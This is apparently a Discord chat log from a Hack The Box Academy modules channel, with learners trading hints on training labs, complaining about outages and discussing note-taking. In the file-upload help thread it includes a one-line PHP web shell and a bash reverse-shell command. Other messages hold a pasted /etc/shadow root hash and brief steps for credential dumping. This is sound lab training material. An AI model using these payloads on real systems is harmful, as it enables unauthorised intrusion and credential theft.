#modules
yes, it's supposed to do that. open another terminal
got the same problem... :/
heyy
same here
is anyone here, i want to ask something
looks like there is an outage
ask
no one is here sorry we are just the NPCs directing you away from company resources
yeah even the ips are taking forever to load

Hello
Did anyone finish the Appsanity box?
Anyone able to nudge me with the Nmap module: Scripting Engine, having some trouble finding this flag.
Just in case you were wondering i installed intel open cl and then it worked. From what i've seen it's a problem with hashcat in a vm coupled with me using an amd processor
Should be easy but not sure what I’m overlooking
Fax incredibly slow.
im trying to go to the course one sec
Dopamine.
im on footprint hard box and nothing will load 
Are the academy servers down? I cant log in :c
is hack the box academy also really slow for u guys?
I cant even load the website so
My scans are slow as shit
yeeeah, I think they have some server issues again..
dude idk what you mean im running faster than forrest gump
-T1 vs -T5 

WELL imma go distribute freedom on helldivers 2
For an explanation and resolution regarding evil-winrm, I saw this post (https://www.reddit.com/r/hackthebox/comments/1b6pmfq/evilwinrm_alternatives_follow_up/) on reddit yesterday.
@heavy edge no nudge :/?
i cant get to the dashboard it times out 
im literally stuck on the footprinting box screen
it may work!!!! is it the network enum with nmap module?
wot
what are you stuck on
yes okay so im guessing one of the ports is 80/443 for a webserver
so you need to look at the http scripts so fuzz it. you can either do --script http* or vuln iirc
I’ve run it through like every category. But the flag that is showing to ME is the previous page’s flag
Http-*?
have you tried going to some of the webpages it lists
ahhhh okkaaaay
i see what i did
just talk to the robots and curl an idea in your head to get the flag @onyx sonnet
also try and enum http via nmap to find the directory
We all agree that acad website is full of 504 ?
dont you mean 502
I've both xd
oh damn
They’re speaking to me
the correct way is http* which runs every http nmap script
The robots have spoken and I’ve listened
gud
They told me 01010100 01101000 01100001 01101110 01101011 00100000 01111001 01101111 01110101 00100000 01000101 01111000 01100101 01100011 01110000 01100001 01101110 01100100 01100001
yeah one of the places you always check is robots. this disallows for the subdir to show up on search engines and such
you can find alot of neat stuff
wait you found it or nah
i cant tell if you are srs
Convert binary to text nerd
academy is dead.
Tis’ the language of the machines you must become fluent. I did find it.
L bozo
and smtp
Hey guys. I have a question regarding SOC path in HTB. i am confused about the target IP. Any help?
Check my profile links, I also indulge in freedom dispensing
yes it is down
Great, the one day I actually plan on doing work lol
please sight tight hack your VMs and eat a burger
502 issues Ray ID: 85fafb74193c869b
Wonder if someone unplugged something in the data center to make space for their space heater. New person, intern, etc... 
nah they unplugged the server to plug in the microwave duh
Oh man!! And if they cook fish. Off with their heads!!
Priorities, so important 🤪
Academy is down....once again.
if i cant eat my bean machine burrito deluxe, what use am i ?
Maybe it's a blessing in disguise. I've been spending all my days in front of the screen.
Time to touch some grass.
nah its time to helldive

Oo wait, wonder if it's a cloudflare issue. Just saw a random error popup and then disappear to the HTB we are working on it issue.
yes same with me
It's me or Academy is down rn ?
its you
We are all a little down
here too ( EU )
Here too (Chernobyl)
That why we are here oc
its just u
😭 😭
Working again for me
Y’all should touch grass at this point
Kid named 'grass': 😳
Valheim gives me enough contact with nature don't worry
Touché
You’re def not in that town
WANNA BET
It’s an active war zone lol
My friend Anatoly would like to disagree
But he can't. He's taking a rather long nap.
lol
ITS UP
That’s what she said
ACADEMY IS UP
It's been up for a long time
nah
Ah, I thought you meant the power plant
just got up, its been down
The city is taken over by Russia
but now its up
Well I'm happy for you brother
It’s an active war zone
Join the club
Error 504
haha
Out here in Chernobyl, there are no oppressors.
Only protons.
yeah okay thanks
just got up
that was my question
lets goooo
its up now
what could happened? 😄
It’s up!
yeah its up for me as well
Yeah it’s back
:hero by nickel back plays in the background :
Yep same here. Back up. Took a minute with the loading screen. Akin to the hot busy bartender yelling get to you in a second 😂
I'm in the Live Engagement for Shells & Payloads and the machine i RDP to doesn't have a browser. Can anyone nudge me in the right direction?
Yemen threw grenades at all the underwater internet cables
firefox in the terminal
I think i remember that one.
Try downloading a mini portable browser for Windows on to the host, and use it to access whatever site you want.
Or, you could proxy your connection, and access the site from your attackbox. Look into 'rdp2tcp', use that to start a SOCKS5 proxy, and route your browser's traffic through that.
Interesting. Thanks!
Yeah true, I'm, not great with proxies yet. But I'll give it a shot if nothing works. Thanks!
There's modules about Pivoting. Go through them.
Once you get a bird's eye view about the whole thing, it'll be second nature to you
Good luck!
That's a module im looking forward to!
the target to rdp into is a linux host, how would transferring a browser for windows help?
Ah, then it's not the one I remember.
I did a module weeks ago which involves accessing a site, but there were no browsers on the system. It was a windows box.
On that, what I did was transfer a portable browser, very small.
I used that.
I can't remember any modules that need a browser but the target doesn't have one installed
This might be a stupid question. But what does it exactly want from me? I can see that it wants me to list a protocol. Is that normal? It kinda feels a bit out of scope from the content I've been doing in this module :p
I could tell you, but i forgor
Firefox http://YADA-YADA
You missed the protocol - http
Aren't we all?
I got a question
How do y'all have these Discord roles in your profiles? (Like "HackTheBox - VIP" and stuff?
On the Linux Priv Escalation module. Has anyone ever figured out how to get into the target without using the HTB provided creds? I've already got all the flags it's just bugging me. DM if needed as to not provide spoilers.
Have you tried opening your eyes?
I'm just practising my Customer care skills
Hey bunny
Here is the general chat #general
Hi Bread
Thank you
for some reason this doesn't work. I'll try to reset and pray it works.
What's the error?
what error? and you just have to type firefox to open the browser
same as before
For some reason once I opened it , it worked but idk why it was not showing . Thank you
It gives me the exact same error as the first screenshot i sent
oops
did you rdp or ssh
Bread
rdp
Bread my brother wolf 
Head over to general
Can you ping the internal web server?
Ah
Just spent an hour on this issue. Thank god it works now xd
The age old "Turn it off and then turn it on again"
Thanks for the support @next bronze and @empty imp ❤️
Always works!
I wonder why the hospital staff were so mad at me when I did the same with a ventilator.
yeah so weird 
hey how do you guys take notes
I use OneNote for Windows 10. I know a lot of people use Obisidian. But the nice thing about OneNote it syncs to all ur devices and is free and veeeery easy to use.
yes but i found everything important and typed almost all the module
if i will leave something then i think that i will forget it
how do i manage this
Cherrytree here
Well, I usually read one section and then take a few bullet notes of what i think was the most important points and then the commands I use for the test. But it really depends on you. I would recommend not taking too many notes, since it can get cluttered really easily.
Thank you very much
is it unstable for anyone else? xfree is closing out and i have to keep resetting the IPs
yes, me too, but the connection to openvpn is also unstable
use tcp vpn
yeah even just pinging and using onesixtyone im having issues
i'm trying to download again the file to connect to the vpn but i don't think will change the situation
Your notes will evolve over time. I use Obsidian and essentially paste the whole lesson into there and go back and take an abundance of notes and screenshots during the exercises, then go back and take the highlights from my notes on a new tool or methodology or useful command and add it to my own cheat sheet. Take more notes rather than less, then go back and clean it up to show your methodology and highlight your own mistakes to learn from them
do you mean to change proto udp to proto tcp?
yo
thankyou very much i will try this method
You can PM me if you want to see how I've done it
somonme teach me how to ahsck
ye
i did it, it can't establish a connection,
are your creds correct? my rdp worked fine
i was talking about the vpn, in terminal is blocked to establish connection
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
in the web site they talk about an incident in the EU Academy Lab Controllers, but the state is resolved
contact support
https://academy.hackthebox.com/module/145/section/1346
im stuck on the server side attack skill assessment i found a file that had 3 strings base64 backwards i've combined them and now im trying to curl it and nothing
am i even on the right track?
Notion is good but its browser based so I wouldn't store any PII info and or Confidential in there.
notion is nice but I think one note is better
Yea its notes so personal preference is key.
it works now! I just downloaded again the ovpn file and run it under udp
I have a dumb but possibly legit question for you
i really tend to over think dude
medium and HARD module really makes me mad at myself
yes?
Is "are belong to us" in your bio a misspell or just something my brain is too smooth to understand?
Haha that makes sense, I was thinking it was just something that proves my Autodidactic insufficiency.
nah just an old meme
Hey there, has anyone done the Hard footprinting lab? I'm really at a standstill on it.
Which part, impacket?
just finished it
no, it is a part of the footprinting module
I've only gotten as far as scanning and seeing it is a pop3 imap server with ssh. I can establish connection with both imap or pop3 but no commands work, i'm not sure if I need to authenticate or if I need to look at some more specifics of the dovecot version or what.
yw
i'm on the File Upload Attacks module and been banging my head to find out the upload path of the image in the SKILL ASSESSMENT... plz help me with this one... urgent,...... 😭
ideally this takes info directly from nmap stuff. you wanna make sure you are scanning every corner you can so you can check it off
this was what I used for transparency : -sV -sC -v -p
also it may be -f lol i cant remember the "fast" scan setting
.
id just do -sV -sC -sU/sS and -f if you are doing udp. only -p if you are targeting specific ports with nmap scripts
-sU/sS depending on tcp/udp
hello, is it possible to connect (RDP) to a windows host via windows?
the VM xfreerdp works but really slowly for me, I downloaded openvpn on my windows host machine and tried connecting to my target machine via remote desktop connection but it says logon attempt failed:
this is how it looks
I can ping the machine -
(in theory) there should be no difference right?
Try to restart it, sometimes I got this happen too
is it a domain cred? you might need to specify that
yeah its a user on a domain
domain\user
oh, one sec lemme try that as well
oh it works! thank god I was going to skip all the windows RDP stuff because it was just killing me how slow it is, thanks so much
is windows rdp faster than xfreerdp? 
not 100% sure, but since I'm running a VM into xfreerdp it might be eating my resources, I'll have to check though admittedly right now I'm getting a black screen
hit enter
hmm nope it's just stuck now, tried to log into it again and same thing
wish there was a way to do this via terminal so i can see some logs
Hey man your advice was very helpful, I have a new lead now! Thanks!
im gonna restart one more time and try it again and if it doesnt work i'll just do it via my vm
help me anyone plzz
welp, can't get it to work for some reason, if there are any other ideas please do tell
no idea about that one, never used win rdp for academy targets
freerdp exists for windows, maybe you can try that one
This password mutations lab is annoying. Hydra has been trying to crack this password for 45 mins
Hello ?
Any hints for Footprinting HARD ?
i'm into tom user ( ssh)
Have you checked the root folder?
i'm as tom user so i guess i can't access root folder
ls -al
yes i checked that and also logged in into mysql but didn't get anything from mysql
you are joking
do i have to dig more into mysql ?
I believe you're at the IMAP/PoP3 part of the lab
i'm not. i have this in front of me
you are actually logged into mysql?
i logged into tom with ssh
yes
Oh, then yes, sql.
DID YOU READ THE QUESTION

yeah but no hints 😦
||Reminder that you can get to mysql from inside the SSH session.||
i'm inside ssh buddy
hes literally in the mysql session
Oh if you’re already in MySQL just enumerate that
is it normal that if i try to spawn a session with PSSession using Villain.py everything crashes?
Oh then...I dunno what else to tell him lol
i cant tell him anything w/o giving the answer
||S H O W D A T A B A S E S ;||
@fathom pendant
buddy that's the thing i was asking, like should i dig more into mysql or just skip it and check other stuff
Thanks btw
but like
hello sir 
Hello 😃
I’m gonna start with cwee path
tell me how it is
lmaooo
i was considering doing the pntp but theyre raising the price 100 bucks
I might need to revise on my web stuff soon 
I do not mind fighting you
😢
I’m gonna start oswe soon
i need to get better at xss/sql/xsrf attacks
i have never ever understood them or how they work or why they work
mr htb god i see
Well partly am, I’m not doing any HTB certs any time soon
do people actually hire those with htb certs?
i know offsec and comptia are big and sometimes gsec, sometimes i see cppt/ejpt etc but curious about htb certs
Not well known, so pretty much no
Hey does anyone know how to solve this question
In linux pass the hash
Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
I check the tmp directory to copy the ccache file but it's not working
Is there student pricing for hackthebox or only for academy?
it's only for academy
Great thank you
i still need help on the server side attacks skill assessment :/
i think im getting it right and still nothing im so confused
I think they tried to patch something and broke another thing
i believe in u
That makes 1 of us
what?
I downloaded the top1million-5000 wordlist, but somehow when I open it in Linux it loads in halfway? When im searching the file I cant find certain words.
what are you opening it with
Hi guys! If you unlock a module using the cubes from a monthly subscription, Do you still keep access to it after the subscription ends?
yep
yep , lifetime afaik
That's awesome! Thanks a bunch 💪
I've been going through the pw attacks hard lab and I'm stuck on
||decrypting and mounting the backup.vhd file inside pwnbox. I tried dislocker but don't really know what I'm doing. I cracked the hashes with bitlocker2john. Can someone point me in the right direction?||
Anyone else had issues grabbing Rev shells in File Upload Attacks module /upload exploitation? i'm using php pentesting shell trying with port 80, 1234, 4444, and the random port machine is hosted on. when i access the page the page hangs like its connecting but get a time out error after about 30 seconds. Getting similar results with msfvenom shell as well. however page resolves to */ after hanging instead of the time out page.
you could try to upload a more simple PHP shell like
<?php system($_GET['cmd']); ?>
then try a command like http://<url>/<file>?cmd=id
HOW CAN I HACK?
that works, but really trying to get it to work with rev shell (trying to focus around oscp requirements atm)
then just start a nc listener (seems that you use port 4444), so try with the command http://<url>/<file>?cmd=bash -c 'bash -i >%26 /dev/tcp/<your-ip>/<port> 0>%261'
where %26 is & urlencoded
do it with burp as a get req and urlencode it
any tips on decrypting and mounting a vhd inside pwnbox? put the details inside this spoiler
do not spoil too much please i want to do this exercise in a "few" mins too 😉
in the pass the ticket from linux section under password attacks i've obtained a hash for linux01 user do i crack the hash using rockyou.txt or the password.list or the mut_password.list that is made with hashcat ?
I did it with Windows if I remember. Passed the file to a Virtual Machine with Windows and made everything there
@livid knoll
that would be working smarter not harder lol.
wasn't sure if this was something that could be done inside pwn. can I PM you if I run into an issue?
Can anyone point me in the direction of making a ticket?
sometimes you have to work smarter than harder D:
TNX
iirc it's a lot of work, way easier to just use a windows vm
like a support ticket or a kerberos ticket? 
lmao support ticket***** please no kerberos for the time being
Need to speak to a person? Learn how to reach our support via HTB Labs.
Legend, Thanks.
anyone around that can help a poor soul with the last question on the final assessment of ADCS?
very hard to learn
what are you stuck on?
Nano is better
unbased and banned
who
gedit is life
This is wild....
nano>>>>>>>>>>>>>>>
Instant friend request
skill issue
:wq
getting to the DC. found jimmy's password, I think i found the DC password (doesn't work). given it is a cert mod, i re-ran certipy with jimmy and see another esc vuln, but idk who that user is
check what group jimmy is in and what perms he has
"username and password is incorrect"
All jokes 🙂

can anyone help me with the password attacks (pass the ticket in linux) section ? i found the linux01 hash but couldn't do anything with it
is nano really real ?
how does that change what I meant
idk anything
because and is not or but i think you should show us the values of $damundsenPassword and $Cred instead
I'm saying that the credentials given are wrong, hence the error
it was an exam and pc desktop
doesn't matter if it's and or if or else or whatever, the error suggests that the creds are wrong
very easy
for u but me no
if I can do it anyone can 😁
Isn't FindByIdentity a credential verification?
^
dm if u want
why
nvm i know it
it boils down to you have incorrect creds
otherwise it wouldn't spit out the a or b response
if your initial question was regarding mounting the b*.vhd from a skill assessment: there's a guide if you use discord's search feature
I really don't know why you're replying like you're sure that isn't the error and trying to correct me, but I'll entertain you, FindByIdentity is called by Set-DomainUserPassword in powerview
https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1#L5537
Hello can you help me please ?
you're trying to set a password, isn't it? to set a password you'll need a user with sufficient rights, so valid creds will need to be applied
^
the section goes over it actually fairly well
you likely misread a step; or skipped one and didn't realize
however if you're using the ForceChangeUserPassword you don't need the OG password; just your password
as in the password of the account you're leveraging the account with
Where is my message???
Hey I'm currently working with medusa. I have multiple user name and a password list.
I want to run a thread per user example first thread takes a user1 and the password list and the second thread takes user2 and password list etc...
I've added -L tag but it didn't parallelize for multiple logins but testing one by one
Somebody have the same issue with the connection? I cannot ping the academy box in the Windows Privilege Escalation Skills Assessment - Part I from the pwnbox or from my own machine with the VPN.
hi, i have a problem with the SIEM & SOC fundamentals : SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe).
Here is the question : "Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X".
When I enter 2023-03-06 I get the wrong answer and I don't know what the right answer is other than that...
can anyone help me please ?
Man, how am I supposed to do any of the RDP labs when the entire spawned server crashes just from me trying to open cmd.exe on the remote desktop
is this error expected?
I'm not sure what you're doing exactly but keep in mind that the CA is not on DC
is that from the ADCS module? i remember that error, it was because i was doing something wrong
sounds suspiciously like what would happen to me when I had accidentally open multiple vpn/pwnbox sessions
It might actually be the vpn. I've noticed that even if I don't connect via RDP and just let the server sit, after maybe 5 mins I can't ping it anymore and have to reinitialize the vpn
did you make sure to kill all your vpn instances first?
I only have the one running
This sounds exactly like the symptoms you get if you have another instance accidentally running
sometimes they don't all die properly;
sudo killall openvpn is a good way to make sure they all are stopped
Not to be rude but I didn't ask if you only have one instance, I asked if you checked. Subtle difference
I believe you think you only have one instance, but did you confirm it
^
Happened to me on my Oscp exam even
sometimes it literally can be dumb and somehow run 2; or it can silently fail and initialize twice
What's the command to see all open vpn instances? I'm not seeing it on the --help
ps -aux | grep 'openvpn'
you don't need the -
get skill issued
(meanwhile hasn't completed the AD module after months and doing it like every other week)
Yeah just the one instance, but crossing my fingers because this one is persisting longer than before after a modem reboot. Probably disconnected any other instances if there were any.
extra dash, sent to the shadow realm 
minor spelling mistake; the payload instead sends all your browsing data to the NSA
switch the vpn server, download the file again, reboot, delete the old .ovpn file, connect again
tbh though it's genuinely funny (i've done it too) where the reason something failed is because a single spelling mistake
@loud prawn
reboot isn't a guarantee, that's exactly what happened for my oscp mishap
comon
the openvpn process resumed in the bg even though I couldnt see it in my term. So I started a new one and it fucked things
Even after you killed it?
skill issue ig
i lov you marcielee
Nah once I manually killed I was all good
always good opinion
no way it's the only troubleshooting step you need 
I professionally work in repair and can tell you that's a lie 
reboot didn't work - my computer is now speaking in tongues, please advise
seen it
we talked the other day about cpts and i will tell my friend at htb to mod you
for great service and contribution to the community
Customer had factory reset their mac, the voice was the setup assistant

this is me rn when i see you macie
dont be weird
its not
can you fucking not?
also embed fail
nah i'm good
ur loss .-.
<@&861185840277487616> person is being fucking weird
i'm sure i'll recover
xd
Don't be gross.
LMAOOOOOO
macie i guarantee u they setting me up
if i may, i can dm it to you to counter their vain attempt
they just jealous
Keep this channel clear of nonsense that isn't related to module content
#rules , then verify in #bot-commands
You've been in the server for 5 years and never figured out how to verify your account
Then you'll be able to see general chat
T-T
Working on File Upload Attacks (Blacklist Filters), i found some extensions that bypass the filter, and when i navigate to them i can see it was successful in the source code but any commands result in a blank white page. Any idea what im doing incorrectly?
That just means that despite bypassing the blacklist filter this extension isn't able to execute the PHP code, as you can see by the output all you see is the raw PHP web shell code. So keep trying different extensions until you find the one that can bypass the blacklist and also execute PHP code
Yes, of course 🙂 There is only one tool mentioned in the module. I have discovered already subdomains including subdomain of subdomain of inlanefreight.htb but still no luck in finding the one ending with 'x.x.x.203'. Any hints? There are many files in the SecLists, I already tried a few.
you gotta be fierce with it
wot teh fook
hey i am new here where can i find the section related to people working on zephyr right now :<
(or just talking about it)
Ooooh.................................................this was sooooo hidden...cannot believe this!!! Finally got it! Solution=subdomains+another_wordlist
Just for the attention of the Footprinting - DNS module writer: there are 18 (!) different wordlist files in among the SecLists.
Thanks very much, I figured out with a hint from someone. I did not know that a subdomain can be further bruteforced with the tool. I really appreciate it. TIL!
In short: why wouldn't it
I mean common convention is start small
https://academy.hackthebox.com/module/51/section/478
In this section I don't understand why they used cp command to move shell to /mnt directory when the directory already has the file and where are they trying to move it from?
```
htb@NIX02:/tmp$ gcc shell.c -o shell
root@Pwnbox:~$ cp shell /mnt
root@Pwnbox:~$ chmod u+s /mnt/shell
```
I don't see where it's showing shell is already there
I see you're mounting tmp to the device
Then moving shell directly to the mnt location
you see in the NIX02's tmp directory is where we compiled the shell binary and then mounted it onto pwnbox
Module:NTLM Relay Attacks
Question Skills Assessment:Compromise BACKUP01 and then submit the flag located at 'C:\Users\Administrator\Desktop\flag.txt'
Hi can anyone give a hint im stuck here (edited)
yes. then why are they trying to move the shell from my device to target machine. It doesn't make any sense because I don't have shell in my device it's already on the target
You're setting the sticky bit
I.e. making it always run as root
So when you go back to the target and run it: you become root
use the domain cred you got from the first question to enumerate what can be used
I get that part. But my question is when we mounted the /tmp to /mnt all the files in the tmp supposed to show up in /mnt. Then what is the purpose of copying to /mnt again. It's like copying the file again into same directory
It's so you can have write permissions, likely
MODULE: HTTP ATTACKS
SECTION: HTTP Response Splitting
Could I get a nudge on payload formatting for interacting with the Admin user? I'm a little confused as to what page the notional admin is checking for triggering the payload.
probably. But it still not working even if I do cp or not
hello, if I pay gold annual, how that works? can I access Modern Web attack module?
yeah anything tier 3 and below
Thanks, is that tier 3 max? or htb has tier 4?
yeah but only a few
you also do still earn the cubes from completing modules
20% for all tiers except 0; which is 100%
I know I have it right, but I'm told it's wrong, there must be something about the format of the answer I'm giving it, is there anyone that can help on that?
For example, I've tried 192.168.0.255 for a network
and 192.168.0.1 for broadcast
Sorry, I meant it the other way around
What am I supposed to be putting in the \\?\GLOBALROOT\ part of this command? "cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit"
well it depends on the question
for example in a 10.x.x.x network, a 192.168.x.x address wouldn't be applicable for its addresses
So it wants the IP of the box I've compromised?
i wasn't responding to you
Oh, whoops
You will need to provide more information. For example, what is the subnet mask?
Yeah, I realize that now
I believe the section explains it
This is all it says. Then it starts talking about using CME as an alternative
yes
you can literally use that exact syntax
you don't need to replace \\?\GLOBALROOT\ with anything; it's a filepath itself
Right behind you bro starting the skill assessment soon damn thought I was finally about to catch up too 🤣
\\?\GLOBALROOT refers to the disk itself's file root, not the windows C:\ root
i was stuck a few days on the last 2 modules
File Inclusion skill assessment definitely had me stumped for longer than I expected
hehe me too
I'm hoping File Upload assessment won't take too long
I must've just messed up somewhere then.
at work 🙂
I assumed I had to change the path somehow
It's a /27
255.255.255.224
Cool. Then your answer was indeed wrong.
Does the directory NTDS exist?
btw use NXC instead of CME 😉
It never asked me to create it so I assumed it was there by default, but it's possible it doesn't
Try copying to temp
It took me like 20 mins of trying various methods before I could finally get CME working and I had to use poetry to do it. Least I can do is use it for a bit before switching to netexec lol
lol yes but netexec is way more stable and has more functions 🙂
Yeah, I'll have to give it a try
@buoyant void i did have a layer 8 problem the last 2 days 😄
I'm missing something here. let's say it's the second network for 192.168.1.0/27, what would be the network and what would be the broadcast?
yes use pipx X and bam, works
What's the point of pipx? Is it just an advanced version of pip/pip3?
it works
Network: 192.168.1.0, Broadcast: 192.168.1.31
and they recommend it , so i use it
That's the first subnet?
just use a subnet calc 🙂
the Second one would be 192.168.1.32 for the network and 192.168.1.63 for the broadcast
and yes, I did use a subnet calc
Looks right.
you should provide the full question: Split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer.
ok that sounds different
without knowing the question we wouldn't know it needs to be split into 4
which module is that ?
Intro to networking
intro to networking - subnetting
maybe i should take a look after hehe
I didn't even know there was a networking/subnetting module, I'm going to have to check that out
I could use a refresher also... lol
I also said earlier: it depends on what the question is asking
Every time I take the time to learn about subnetting and networking it makes perfect sense, and then a few weeks pass and my brain just puts it all in the recycle bin
I get it.
And I agree I used to do this in my head, but haven't in years, anyway, I just figured it out.
did anyone take the bloodhound module ?
yeah I did
it's an alright module but compared to all the other tier 3 ad modules, it's probably the weakest imo
Not strictly
As the web stuff is likely just barely a blip/covered by the modules in the path anyways
Too much prep can cause you to overthink
in linux fundamentals module: Find Files and Directories this command won't work for me "find / -type f -name *.conf -user root -size +25k -newermt 2020-03-03 -exec ls -al {} ; 2>/dev/null"
what is the error msg ?
no error message it goes to the next line for new commands
then it did not find anything
interesting
2>/dev/null
shows: "find: paths must precede expression: `Templates' find: possible unquoted pattern after predicate `-name'?"
are you running the command in pwnbox or the target? did you ssh?
was literally about to suggest this
it sounds like a common layer 8 issue with this module
ok 2 am .... good night 🙂
This is a dumb question but I keep meaning to ask it and forgetting, when I get something like this ||root:$6$XePuRx/4eO0WuuPS$a0t5vIuIrBDFx1LyxAozOu.cVaww01u.6dSvct8AYVVI6ClJmY8ZZuPDP7IoXRJhYz4U8.DJUlilUw2EfqhXg.:19032:0:99999:7:::|| from a /etc/shadow, which part of that is the actual password hash?
I thought SHA-512 starts with $6$ but I just can't parse the sections
you can throw the whole thing at hashcat i believe
it's built in a way to parse it so you don't have to
also delete that as it's literally a hash of an account you gotta crack
that explains it all
even though you put it in "spoilers" it really doesn't do much
I know, but it's the answer to one of the lab questions so I thought that would be the right way to do it
Yes it can be cracked with the right password
The password attacks module has you create a mutated list: try that first
hashcat just tells me that no hash-mode matches the structure of that lol
you specify hashcat mode with -m
Maybe I should do the hashcat module sooner rather than wait for it to pop up in queue
literally the module gives you the syntax as well
if you don't use -m it assumes the first argument is the filename of the hash file
therefore it's trying to autodetect 1800 as a hash
Gotcha
instead of the mode you're trying to use
that's why it's giving you the error "No hash-mode..." because there is no hash mode that would output a 4 digit number
I missed the unshadow step too so that would've helped.
hi
Web Service & API attacks, I still can't find this dumb parameter. Information Disclosure (with a twist of SQLi) is the specific part of the module, i'm using the wordlist mentioned in the module but it never shows the other parameter that can be exploited with sqli. i tried another wordlist that was about double the size of the one suggested, but that didn't find anything either. can someone tell me the wordlist to use or give me a hint if i'm just totally off here?
I spent over an hour troubleshooting a stupid question that turns out I was getting right the entire time and I just needed to reset the target
I really need to start resetting the target sooner
ahh it's not another param that's vulnerable, i see
still not sure why my payload didn't work, sqlmap worked but that's not the intended way. idk why they threw this random sqli thing in a module that has nothing to do with sql and doesn't teach it
i see why it didn't work, i was doing '1 or 1=1; --, instead of just 1 or 1=1; --
simple syntax slip-ups screw you
@hallow remnant You can DM, if you're still stuck on the HTTP Response Splitting Section.
eee how to do this? i checked the time and event id but process name was different
it would be better if they just give the event log file
thanks for the help so far! funny i'd thought this discord would be flooded and it'd be impossible to get help.
A logon took place at that time, so check for something that you can tie to that logon
Free platforms for bug hunting practice anybody please tell me ??
Bug crowd, hackerone
Was having an issue with the Skills Assessment - File Upload Attacks module. I found the path to the files, and the format of the filenames via base64 decoding - but even totally normal pictures I uploaded were 404ing.
As I was typing this request for help, I tried to put in tomorrow's date instead of my own on a whim and surprise, it worked. Guess there's some timezone shenanigans going on 
Been struggling with this for a while.
the servers are technically hosted in EU; so you do have to bear in mind that difference
So I've learned 😓
Module: INTRO TO WHITEBOX PENTESTING, Section: Skills Assessment, Question: The attached archive contains a basic script that may be vulnerable. Try to identify as many vulnerabilities as you can and patch them. Then, visit /patch and paste the patched script to get the flag, or to know what you have missed.. After I patched the code correctly I got the prompt "code injection should not be possible, even without sanitization or validation". I understand that I should have blocked code injection, but I don't know why there is no flag feedback.
Probably because you need to patch it more?
can I dm you
I haven’t done it yet
lol
why are you pinging random mods?
idk if that was one of them, or you being a pussy and not owning up to it
btw there's chat logs, they know
i have the hash but no creds
in many cases with windows; Hashes are as good as passwords
i know i have tried to pass the hash but no luck
hey
I think the module >
abusing http misconfiguration > identifying unkeyed parameters
have some problem
I tried both ways
first steal admin cookie
and second steal the response of the /admin.php?reveal_flag=1
but did not get the response to my server
relay it to dc, maybe use the || ldap || protocol
I got a question regarding Attacking LSASS.
we can dump shares with CMD by making it powershell and giving administrator privilege. then what's the benefit of it? Is this thing useful in AD pivoting?
yes
some accounts might have mismanaged privileges across the domain
I.E. SEImpersonatePrivilege OR ForceChangeUserPassword or something along those lines
(or GenericWrite)
any user that's currently logged in will have their credentials stored in lsass memory, for example a domain user. it also stores kerberos tickets
so it uses only to gain DC admin creds, right?
no, the technique works on any hosts and what you get depends on what's on the system
okay get it. but basically to get different user creds, right? because we can dump lsass (at least when we don't have GUI) only with Administrator privileges
i am sorry to give trouble about this but i am really confused with it. I tried GPT to understand the concept but couldn't understand it fully, that's why I jumped over here
yes correct
okay great, thanks @next bronze & @fathom pendant
is hklm\system needed for hklm\security?
it was not explained in the module but also think that ntds.dit requires the hklm\system. thanks
hklm\security is useful when target is connected to domain.
but as per my understanding, both are not dependent on each other
yep, the bootkey in system is needed to decrypt the hives
system and save are needed at the bare minimum i believe in order to get anything from the ntds.dit; secret is sometimes needed but not always
if you can get all 3, extract all 3
👍
got it guys. thank you for clarifying
These modules where I have to connect to the world's laggiest RDP server and do all my activities from that are brutal lol
they test your patience 😄
hello who can help me plz with this exo : https://academy.hackthebox.com/module/51/section/476
Hi, am currently doing the Skills Assessment for the module Kerberos Attacks.
Currently stuck at qn 3:Which user allows you to connect, as administrator, to the server with unconstrained delegation?
Will anyone be able to provide any nudges? Thanks!
Hi guys, on "Windows Attacks and Defense | Credentials in Shares", any ideas on how to import Powerview's "invoke sharefinder". The VM is not connected to the internet so I can't download straight from Git, might be being stupid I dont know.
you have domain creds correct? use that to enumerate and carry out some common attacks
the powerview module is on the machine
Hiya, doing the skills assessment for cracking passwords with hashcat. On q4 crack the kerberos TGS ticket hash, when i run it in hashcat i just get no result and status 'exhausted' instantly. Looked up someones walkthrough and my command is exactly the same so not sure why mine isnt working. Anyone know?
im doing one of the sqlmap chall in academy and i keep getting connection error
what would be the issue ya
Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
I'm stuck in this question any help
I've been banging my head on this Skill assessment (FILE UPLOAD ATTACKS) for over a day now and still haven't got the source code which would probably be containing the upload path.
I've successfully uploaded the SVG containing XXE which would've given me the source code but all it returns is just my payload and nothing from the source code... please help somebody...
can anyone help me with this answer? I don't see the problem
did you try doing what the question asked
i mean looking at the visualization
hi, on Server-side Attacks> Blind SSRF Exploitation Example here I have troubles understanding how the reverse shell payload gets double url encoded. I have tried multiple times (using jq as shown in previous section) with different tools, I can't find a way to properly double encode my payload.
The provided payload in the example encodes single quotes and parentheses and mine (with jq or other tools) doesn't.
Any suggestions please ?
Yep
I don't understand what I'm supposed to do here
except put 2023-06-03
did you try 2023-03-06
06-03 is June 3rd
yeah but UK uses a weird format and isn't htb in the uk lol
yep i tried it too
plus if it's not working it's worth a try
i wish i had access to my notes anywhere
that's one reason i use onenote
so there is a date there yes
there are other note taking apps that are online as well
that's not necessarily the date the action occurred
i agree with @dim wolf , it looks like that's simply the date you started the filter, not the results from the search/filter
that's the only thing i can think of right now
notion ❤️
ok i will check this later
thank you
seems like there would be an issue with your payload
Try reviewing the limited file uploads section 😉
what is everyone's favorite module? which one do you think is definitely worth getting?
honestly depends on what you wanna do
i want to do it all lol
i found the investigating with splunk module to be awesome
Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
Did anyone here pass the exam already?
Is it similar to Attacking Enterprise Networks module?
Any one knw how to solve this question
i did intro to assembly earlier and that was pretty worth
